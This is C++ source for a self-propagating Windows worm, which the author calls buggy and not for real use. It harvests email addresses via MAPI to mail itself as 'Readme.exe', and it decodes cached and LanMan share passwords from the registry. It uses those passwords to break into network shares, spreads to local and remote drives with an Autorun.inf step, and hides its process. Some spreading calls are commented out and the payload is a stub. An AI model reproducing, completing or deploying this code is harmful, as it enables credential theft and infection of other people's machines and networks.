// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :).
// This code is obviously buggy and not intended to be actually used in the
// 'real' world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a 'game' with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the 'game', its just a perverse example of too much time on ones
// hands :). this is version 1.00 so the are bugs, incompatabilities with
// various flavors of windows and other anomolies - dose! but if you want
// something better write it yourself ;) (and send me a copy)
//
// "this is the end, beautiful friend" - the doors
//
// ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--//
//--header-files--------------------------------------------------------------//
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>
#include <conio.h>
//--defines-------------------------------------------------------------------//
#define MAX_LENGTH 128
#define MAX_RECIEVERS 50
#define MUTEX_NAME "w0rm"
#define EARTH_WORM_JIM "Readme.exe"
#define WORMGAME_PORT 12345
#define WORMGAME_MAX_WINS 10
#define WORMGAME_PKT_PLAY 0xFF
#define WORMGAME_PKT_WIN 0x80
//--globals-------------------------------------------------------------------//
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;
BYTE iEntry;
BYTE nType;
BYTE abResource[1];
} PASSWORD_CACHE_ENTRY;
typedef struct WormGamePkt {
BYTE pktType;
int pktNum;
} AWORMGAMEPACKET;
//--function-declarations-----------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID );
DWORD WINAPI WormMainThread( LPVOID );
BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();
extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
//--entry-point---------------------------------------------------------------//
// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
int main( int argc, char **argv )
{
HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
DWORD WormGameThreadId, WormMainThreadId;
// display explorer window if we need to, due to autorun.inf file :)
// test for any command line...
/* only allow one instance of worm to run on system at one time */
hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
if( GetLastError() == ERROR_ALREADY_EXISTS )
{
ExitProcess( 0 );
}
ptrEgo = argv[0];
/* try to 'hide' the process */
if( runningNT() == TRUE )
{
// hide process in winNT
printf("WORM running on WinNT\n");
} else {
printf("WORM running on Win9x\n");
LoadLibrary( "KERNAL32.DLL" );
RegisterServiceProcess( NULL, 1);
}
/* go resident and give worm RAW power */
hEgo = GetCurrentProcess();
SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);
// create suspended WormMainThread...
hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
if( hWormMainThread != NULL )
{
// set thread to time critical... 'i wana take you higher' - sly and the family stone
//SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
// resume thread execution...
ResumeThread( hWormMainThread );
}
/*
// create suspended WormGameThread...
hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
if( hWormGameThread != NULL )
{
// resume thread execution...
ResumeThread( hWormGameThread );
}
*/
/* wait for hWormGameThread() to terminate */
// WaitForSingleObject( hWormGameThread, INFINITE);
WaitForSingleObject( hWormMainThread, INFINITE);
printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");
getch();
/* release our mutex, next local worm wont get blocked */
if( hMutex != NULL )
{
ReleaseMutex( hMutex );
}
return 0;
}
//----------------------------------------------------------------------------//
DWORD WINAPI WormMainThread( LPVOID )
{
DWORD dwSize;
char buff[64];
printf("WormMainThread: started...\n");
/* spread worm via MAPI */
propogateMAPI();
/* get any passwords we can for use later on */
getSharePasswords();
getCachedPasswords();
dwSize = 64;
WNetGetUser( NULL, buff, &dwSize );
addPassword( buff );
printf("DEBUG: total pwds got = %d\n", index);
/* spread worm via any/all localy maped drives */
propogateDrive();
/* spread worm via any/all LAN network shares */
propogateNet( NULL );
/* finished our little game :) */
ExitThread( 0 );
return 0;
}
//----------------------------------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID )
{
WSADATA w;
SOCKET s_recv, s_send;
sockaddr_in saddr, saddr_in, saddr_out;
int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
AWORMGAMEPACKET gamePkt;
fd_set fd_read;
struct timeval timeout = { 5, 0 };
if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
{
printf("WormThread: WSAStartup failed\n");
goto endThread;
}
s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
{
printf("WormThread: invalid socket\n");
goto endThread;
}
memset( &saddr_in, 0x00, sizeof( struct sockaddr));
memset( &saddr, 0x00, sizeof( struct sockaddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons( WORMGAME_PORT );
saddr.sin_addr.s_addr = INADDR_ANY;
memset( &saddr_out, 0x00, sizeof( struct sockaddr) );
saddr_out.sin_family = AF_INET;
saddr_out.sin_port = htons( WORMGAME_PORT );
saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
optval = 1;
if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
{
printf("WormThread: setsocketopt failed\n");
goto endThread;
}
if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
{
printf("WormThread: bind failed\n");
goto endThread;
}
FD_ZERO( &fd_read );
FD_SET( s_recv, &fd_read );
randomize();
loop:
while( 1 )
{
if( totalwins >= WORMGAME_MAX_WINS )
{
releasePayload();
totalwins = 0;
}
// pick a magic number...
magicWorm = ( ( rand() % 100 ) + 1 );
printf("WormThread: picked a magic num: %d\n", magicWorm);
// wait a length of time...
Sleep( 500 );
// send my magic number...
gamePkt.pktType = WORMGAME_PKT_PLAY;
gamePkt.pktNum = magicWorm;
if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
{
printf("WormThread: sendto failed\n");
break;
}
// handel responces...
while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
{
if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
{
printf("WormThread: recvfrom failed\n");
break;
} else {
switch( gamePkt.pktType )
{
case WORMGAME_PKT_PLAY: // recieved a magic number...
// ignore responce from local machine...
printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);
// process other responces
if( gamePkt.pktNum == magicWorm )
{
// notify any winners
gamePkt.pktType = WORMGAME_PKT_WIN;
saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
}
break;
case WORMGAME_PKT_WIN: // im a winner :)
printf("WormThread: IM A WINNER!!!\n");
totalwins++;
goto loop;
default: // its all gone bugfuck!
printf("WormThread: its all gone bugfuck!\n");
break;
}
}
} // while(select...
}
endThread:
closesocket( s_recv );
closesocket( s_send );
ExitThread( 0 );
return 0;
}
//----------------------------------------------------------------------------//
BOOL runningNT()
{
OSVERSIONINFO osvi;
BOOL retval = FALSE;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
switch( osvi.dwPlatformId )
{
case VER_PLATFORM_WIN32_NT:
retval = TRUE;
break;
case VER_PLATFORM_WIN32_WINDOWS:
retval = FALSE;
break;
default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE
retval = FALSE;
break;
}
return retval;
}
//----------------------------------------------------------------------------//
void propogateMAPI( void )
{
LHANDLE lhSession;
CHAR rgchMsgID[513];
MapiMessage *lpMessage;
int i=0;
if( initMAPI() != 0 )
{
return;
}
if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
{
*rgchMsgID = NULL;
while( i < MAX_RECIEVERS )
{
if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
{
break;
}
if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
{
// printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
{
strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
i++;
}
if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 )
{
strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);
i++;
}
}
}
MAPIFreeBuffer( lpMessage );
// TO DO: sort addressList and remove duplicates...
//sendMessage( i, lhSession ); // <---- !!!!!!
MAPILogoff( lhSession, 0L, 0L, 0L);
}
for( int x = 0 ; x < i ; x++ )
{
printf("DEBUG: attacking:\t%s\n", addressList[x]);
}
return;
}
//----------------------------------------------------------------------------//
int initMAPI( void )
{
HINSTANCE hi;
LPMAPILOGON MAPILogon;
LPMAPIFINDNEXT MAPIFindNext;
LPMAPIREADMAIL MAPIReadMail;
LPMAPISENDMAIL MAPISendMail;
hi = LoadLibrary( "mapi32.dll" );
if( hi == NULL )
{
return -1;
}
MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
{
return -1;
}
return 0;
}
//----------------------------------------------------------------------------//
int validAddress( char * addr )
{
if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)
{
return -1;
} else if( strchr( addr , '@') == NULL )
{
return -1;
} else if( strchr( addr , '.') == NULL )
{
return -1;
} else {
return 0;
}
}
//----------------------------------------------------------------------------//
int sendMessage( int recipNum, LHANDLE lhSession )
{
MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
for( int i=0 ; i<recipNum ; i++ )
{
recips[i].ulReserved = 0;
recips[i].ulRecipClass = MAPI_TO;
recips[i].lpszName = addressList[i];
recips[i].lpszAddress = addressList[i];
recips[i].ulEIDSize = 0;
recips[i].lpEntryID = NULL;
}
MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
if( MAPISendMail( lhSession, 0L, ¬e, 0L, 0L) != SUCCESS_SUCCESS )
{
return -1;
}
free( recips );
return 0;
}
//----------------------------------------------------------------------------//
int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
memmove(buf, x->abResource+x->cbResource, x->cbPassword);
buf[x->cbPassword] = 0;
addPassword( buf );
return 0;
}
//----------------------------------------------------------------------------//
int getCachedPasswords( void )
{
buf = new char[1024];
HINSTANCE hi = LoadLibrary("mpr.dll");
if( hi == NULL )
{
return -1;
}
WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
if( enp == NULL )
{
return -1;
}
enp( 0, 0, 0xff, pce, 0);
FreeLibrary( hi );
return 0;
}
//----------------------------------------------------------------------------//
BYTE rotr( BYTE b )
{
BYTE carry;
carry = b & 0x01;
carry <<= 7;
b >>= 1;
b |= carry;
return b;
}
//----------------------------------------------------------------------------//
void decodePW( char * pw )
{
BYTE hash = 0x35;
while( pw && *pw )
{
*pw = *pw ^ hash;
pw++;
hash = rotr( hash );
}
}
//----------------------------------------------------------------------------//
int addPassword( char * pwd )
{
if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
{
strcpy( passwordList[ index ], pwd);
printf("DEBUG: ADDED: %s\n", passwordList[ index ]);
index++;
}
return 0;
}
//----------------------------------------------------------------------------//
int getSharePasswords( void ){
if( runningNT() == FALSE )
{
HKEY key, subkey;
DWORD i, maxKeys, len, junk;
char keyName[256], wrightPwd[256], readPwd[256];
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);
RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
if( maxKeys != 0 )
{
for( i=0; i<maxKeys; i++ )
{
RegEnumKey(key, i, keyName, 256);
RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
wrightPwd[0] = readPwd[0] = 0;
len = 256;
RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);
wrightPwd[len] = 0;
decodePW(wrightPwd);
addPassword( wrightPwd );
len = 256;
RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);
readPwd[len] = 0;
decodePW(readPwd);
addPassword( readPwd );
}
}
RegCloseKey(subkey);
RegCloseKey(key);
}
return 0;
}
//----------------------------------------------------------------------------//
void propogateDrive( void )
{
int length;
char buff[MAX_LENGTH], *ptr;
ptr = buff;
length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;
if( length > 0 && length < MAX_LENGTH)
{
for( int i=0 ; i<=(length/4) ; i++ )
{
switch( GetDriveType( ptr ) )
{
case DRIVE_FIXED:
// The drive is a local drive.
printf("DRIVE_FIXED: %s\n", ptr);
attackDrive( ptr, 1 );
break;
case DRIVE_REMOTE:
// The drive is a network drive.
printf("DRIVE_REMOTE: %s\n", ptr);
attackDrive( ptr, 1 );
break;
default:
break;
}
*ptr+=1;
}
}
return;
}
//----------------------------------------------------------------------------//
void attackDrive( char * drive, int type )
{
FILE *fpAutorun;
char buff[MAX_LENGTH];
// copy worm to drive, Attribute = hidden
if( type == 1 )
{
sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);
} else {
sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);
}
printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);
/* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
{
// create an Autorun.inf file on drive, Attribute = hidden
sprintf( buff, "%sAutorun.inf", drive);
fpAutorun = fopen(buff, "w");
if( fpAutorun != NULL )
{
fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);
fclose( fpAutorun );
_rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
}
} */
return;
}
//----------------------------------------------------------------------------//
void propogateNet( LPNETRESOURCE lpnr )
{
DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
HANDLE hEnum;
LPNETRESOURCE lpnrLocal;
dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
if( dwResult != NO_ERROR )
{
return;
}
do
{
lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
if ( dwResultEnum == NO_ERROR )
{
for( DWORD i = 0; i < cEntries; i++ )
{
if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
{
propogateNet( &lpnrLocal[i] );
} else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
{
if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
{
// try all found password/username combinations...
printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
{
attackDrive( lpnrLocal[i].lpRemoteName, 0 );
WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
}
} else {
attackDrive( lpnrLocal[i].lpRemoteName, 0 );
WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
}
}
}
} else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
break;
}
} while( dwResultEnum != ERROR_NO_MORE_ITEMS );
GlobalFree( (HGLOBAL) lpnrLocal );
WNetCloseEnum( hEnum );
return;
}
//----------------------------------------------------------------------------//
int crackNetShare( char * share )
{
int retval = 0;
for( int i=0 ; i<index ; i++ )
{
retval = WNetAddConnection( share , passwordList[i], NULL );
if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD ) // <----- !!! dodgy testing, fix it
{
printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);
return 0;
}
}
return -1;
}
//----------------------------------------------------------------------------//
void releasePayload()
{
printf("\n\t!!! PAYLOAD !!!\n");
return;
}
//----------------------------------------------------------------------------//
A